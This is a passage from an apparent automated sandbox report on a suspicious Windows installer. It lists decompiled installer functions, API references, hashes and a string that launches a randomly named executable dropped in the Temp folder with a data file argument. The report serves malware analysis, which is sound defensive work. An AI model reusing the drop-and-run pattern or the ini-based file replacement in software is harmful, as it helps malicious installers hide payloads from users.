					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                    0x00405038
                    0x00405051
                    0x00405056
                    0x0040505e
                    0x00405064
                    0x0040507a
                    0x0040507d
                    0x004052a8
                    0x004052af
                    0x004052c3
                    0x004052b1
                    0x004052b3
                    0x004052b6
                    0x004052b7
                    0x004052be
                    0x004052be
                    0x004052cf
                    0x004052dd
                    0x004052e0
                    0x004052f6
                    0x0040536b
                    0x0040536e
                    0x00405370
                    0x0040537a
                    0x00405388
                    0x00405388
                    0x0040538a
                    0x00405394
                    0x0040539a
                    0x0040539d
                    0x004053a0
                    0x004053bb
                    0x004053a2
                    0x004053ac
                    0x004053ac
                    0x004053a0
                    0x00405394
                    0x00000000
                    0x0040536e
                    0x004052fb
                    0x00405306
                    0x0040530b
                    0x00405312
                    0x00405317
                    0x0040531b
                    0x00405326
                    0x00405326
                    0x0040532a
                    0x0040532e
                    0x00405332
                    0x00405345
                    0x00405334
                    0x00405334
                    0x0040533b
                    0x00405341
                    0x0040533d
                    0x0040533d
                    0x0040533d
                    0x0040533b
                    0x00405349
                    0x0040534b
                    0x0040535e
                    0x00405361
                    0x00405364
                    0x00405364
                    0x0040532e
                    0x00000000
                    0x0040531b
                    0x004052fd
                    0x00405304
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004053be
                    0x004053be
                    0x004053c5
                    0x00405436
                    0x0040543e
                    0x00405446
                    0x00405446
                    0x0040544f
                    0x00405451
                    0x00405458
                    0x0040545b
                    0x0040545b
                    0x00405461
                    0x00405468
                    0x0040546b
                    0x0040546b
                    0x00405471
                    0x00405477
                    0x0040547d
                    0x0040547d
                    0x0040548a
                    0x004055eb
                    0x004055f2
                    0x0040560f
                    0x00405615
                    0x00405627
                    0x00405627
                    0x00000000
                    0x00405490
                    0x00405492
                    0x00405497
                    0x0040549c
                    0x004054a1
                    0x004054a3
                    0x004054a3
                    0x004054a4
                    0x004054a5
                    0x004054a7
                    0x004054a7
                    0x004054af
                    0x004054f0
                    0x004054f2
                    0x00405502
                    0x00405505
                    0x0040550a
                    0x00405511
                    0x00405514
                    0x004055b6
                    0x004055bf
                    0x004055c7
                    0x004055c7
                    0x004055d5
                    0x004055e6
                    0x004055e6
                    0x00000000
                    0x004055d5
                    0x0040551a
                    0x0040551d
                    0x00405523
                    0x00405528
                    0x0040552a
                    0x0040552c
                    0x00405532
                    0x00405539
                    0x0040553e
                    0x00405545
                    0x00405548
                    0x00405548
                    0x0040554f
                    0x0040555b
                    0x0040555f
                    0x00405561
                    0x00405561
                    0x00405551
                    0x00405553
                    0x00405553
                    0x00405581
                    0x0040558d
                    0x0040559c
                    0x0040559c
                    0x0040559e
                    0x004055a1
                    0x004055aa
                    0x00000000
                    0x004054b1
                    0x004054bc
                    0x004054bf
                    0x004054c4
                    0x004054c6
                    0x004054ca
                    0x004054da
                    0x004054e4
                    0x004054e6
                    0x004054e9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004054cc
                    0x004054cc
                    0x004054d2
                    0x004054d4
                    0x004054d4
                    0x004054d5
                    0x004054d6
                    0x00000000
                    0x004054cc
                    0x004054af
                    0x0040548a
                    0x004053cd
                    0x00000000
                    0x004053e3
                    0x004053ed
                    0x004053f2
                    0x00000000
                    0x00000000
                    0x00405404
                    0x00405409
                    0x00405415
                    0x00405415
                    0x00405417
                    0x00405426
                    0x00405428
                    0x0040542c
                    0x0040542f
                    0x00000000
                    0x0040542f
                    0x004053cd
                    0x00405083
                    0x00405088
                    0x00405091
                    0x00405098
                    0x004050aa
                    0x004050b5
                    0x004050bb
                    0x004050c9
                    0x004050dd
                    0x004050e2
                    0x004050ef
                    0x004050f4
                    0x0040510a
                    0x0040511b
                    0x00405128
                    0x00405128
                    0x0040512b
                    0x00405131
                    0x00405133
                    0x00405136
                    0x0040513b
                    0x00405140
                    0x00405142
                    0x00405142
                    0x00405162
                    0x00405162
                    0x00405164
                    0x00405165
                    0x0040516a
                    0x00405170
                    0x00405174
                    0x00405179
                    0x00405181
                    0x00405185
                    0x0040518a
                    0x0040518f
                    0x00405197
                    0x0040519a
                    0x0040526a
                    0x0040527d
                    0x00000000
                    0x004051a0
                    0x004051a3
                    0x004051a6
                    0x004051a9
                    0x004051a9
                    0x004051af
                    0x004051b8
                    0x004051bb
                    0x004051bf
                    0x004051c2
                    0x004051c5
                    0x004051ce
                    0x004051d7
                    0x004051da
                    0x004051dd
                    0x004051e0
                    0x0040521e
                    0x00405249
                    0x00405220
                    0x0040522f
                    0x0040522f
                    0x004051e2
                    0x004051e5
                    0x004051f3
                    0x004051fd
                    0x00405205
                    0x0040520c
                    0x00405217
                    0x00405217
                    0x004051e0
                    0x0040524f
                    0x00405250
                    0x0040525c
                    0x0040525c
                    0x00405268
                    0x00405283
                    0x00405286
                    0x004052a3
                    0x00000000
                    0x00405288
                    0x0040528d
                    0x00405296
                    0x00405629
                    0x0040563b
                    0x0040563b
                    0x00405286
                    0x00000000
                    0x00405268
                    0x0040519a

                    APIs
                    • GetDlgItem.USER32 ref: 00405049
                    • GetDlgItem.USER32 ref: 00405054
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                    • LoadImageW.USER32 ref: 004050B5
                    • SetWindowLongW.USER32 ref: 004050CE
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                    • DeleteObject.GDI32(00000000), ref: 0040512B
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                    • SetWindowLongW.USER32 ref: 0040527D
                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                    • GlobalFree.KERNEL32 ref: 0040546B
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                    • ShowWindow.USER32(?,00000000), ref: 00405615
                    • GetDlgItem.USER32 ref: 00405620
                    • ShowWindow.USER32(00000000), ref: 00405627
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 2564846305-813528018
                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                    0x00404795
                    0x004048c2
                    0x0040491f
                    0x00404923
                    0x004049f0
                    0x004049f2
                    0x004049f2
                    0x004049f8
                    0x004049f8
                    0x004049fb
                    0x00000000
                    0x00404a02
                    0x00404931
                    0x00404937
                    0x00404941
                    0x0040494c
                    0x0040494f
                    0x00404952
                    0x0040495d
                    0x00404960
                    0x00404967
                    0x00404974
                    0x00404985
                    0x0040498b
                    0x00404993
                    0x004049a1
                    0x004049a7
                    0x004049a7
                    0x00404967
                    0x004049b1
                    0x00000000
                    0x004049bc
                    0x004049c0
                    0x004049d0
                    0x004049d0
                    0x004049d6
                    0x004049e2
                    0x004049e2
                    0x00000000
                    0x004049e6
                    0x004049b1
                    0x004048cd
                    0x00000000
                    0x004048df
                    0x004048e4
                    0x004048ea
                    0x00000000
                    0x00000000
                    0x00404913
                    0x00404915
                    0x0040491a
                    0x00000000
                    0x0040491a
                    0x004048cd
                    0x0040479b
                    0x0040479e
                    0x004047a3
                    0x004047b4
                    0x004047b4
                    0x004047bc
                    0x004047bf
                    0x004047c3
                    0x004047c6
                    0x004047ca
                    0x004047cd
                    0x004047d0
                    0x004047d3
                    0x004047da
                    0x004047dc
                    0x004047dc
                    0x004047e6
                    0x004047f3
                    0x004047fd
                    0x00404802
                    0x00404805
                    0x0040480a
                    0x00404821
                    0x00404828
                    0x0040483b
                    0x0040483e
                    0x00404852
                    0x00404859
                    0x0040485e
                    0x00404863
                    0x00404863
                    0x00404871
                    0x0040487f
                    0x00404891
                    0x00404896
                    0x004048a6
                    0x004048a8
                    0x00000000

                    APIs
                    • CheckDlgButton.USER32 ref: 00404821
                    • GetDlgItem.USER32 ref: 00404835
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                    • GetSysColor.USER32(?), ref: 00404863
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                    • lstrlenW.KERNEL32(?), ref: 00404884
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                    • GetDlgItem.USER32 ref: 004048FF
                    • SendMessageW.USER32(00000000), ref: 00404906
                    • GetDlgItem.USER32 ref: 00404931
                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                    • SetCursor.USER32(00000000), ref: 00404985
                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                    • SetCursor.USER32(00000000), ref: 004049A1
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                    Strings
                    • N, xrefs: 0040491F
                    • "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo, xrefs: 00404960
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$N
                    • API String ID: 3103080414-1178858743
                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                    0x004062ae
                    0x004062b7
                    0x004062be
                    0x004062c8
                    0x004062dc
                    0x00406304
                    0x0040630b
                    0x0040630f
                    0x00406313
                    0x00406333
                    0x0040633a
                    0x00406344
                    0x00406351
                    0x00406356
                    0x0040635b
                    0x0040635f
                    0x0040636e
                    0x00406370
                    0x0040637d
                    0x00406381
                    0x0040641c
                    0x00000000
                    0x00406397
                    0x004063a4
                    0x004063c8
                    0x004063cc
                    0x004063eb
                    0x004063ef
                    0x004063ef
                    0x004063f1
                    0x004063fa
                    0x00406405
                    0x00406410
                    0x00406416
                    0x00000000
                    0x00406416
                    0x004063ce
                    0x004063d1
                    0x004063dc
                    0x004063d8
                    0x004063da
                    0x004063db
                    0x004063db
                    0x004063e3
                    0x004063e5
                    0x00000000
                    0x004063e5
                    0x004063af
                    0x004063b5
                    0x00000000
                    0x004063b5
                    0x00406381
                    0x0040635f
                    0x004062de
                    0x004062e9
                    0x004062f2
                    0x004062f6
                    0x00000000
                    0x00000000
                    0x004062f6
                    0x00406427

                    APIs
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                    • GetShortPathNameW.KERNEL32 ref: 004062F2
                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                    • GetShortPathNameW.KERNEL32 ref: 0040630F
                    • wsprintfA.USER32 ref: 0040632D
                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                    • GlobalFree.KERNEL32 ref: 00406416
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 0040615C
                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                    • API String ID: 2171350718-2295842750
                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                    0x0040100a
                    0x00401039
                    0x00401047
                    0x0040104d
                    0x00401051
                    0x0040105b
                    0x00401061
                    0x00401064
                    0x004010f3
                    0x00401089
                    0x0040108c
                    0x004010a6
                    0x004010bd
                    0x004010cc
                    0x004010cf
                    0x004010d5
                    0x004010d9
                    0x004010e4
                    0x004010ed
                    0x004010ef
                    0x004010ef
                    0x00401100
                    0x00401105
                    0x0040110d
                    0x00401110
                    0x00401112
                    0x00401118
                    0x0040111f
                    0x00401126
                    0x00401130
                    0x00401142
                    0x00401156
                    0x00401160
                    0x00401165
                    0x00401165
                    0x00401110
                    0x0040116e
                    0x00000000
                    0x00401178
                    0x00401010
                    0x00401013
                    0x00401015
                    0x0040101f
                    0x0040101f
                    0x00000000

                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectW.GDI32(?), ref: 00401105
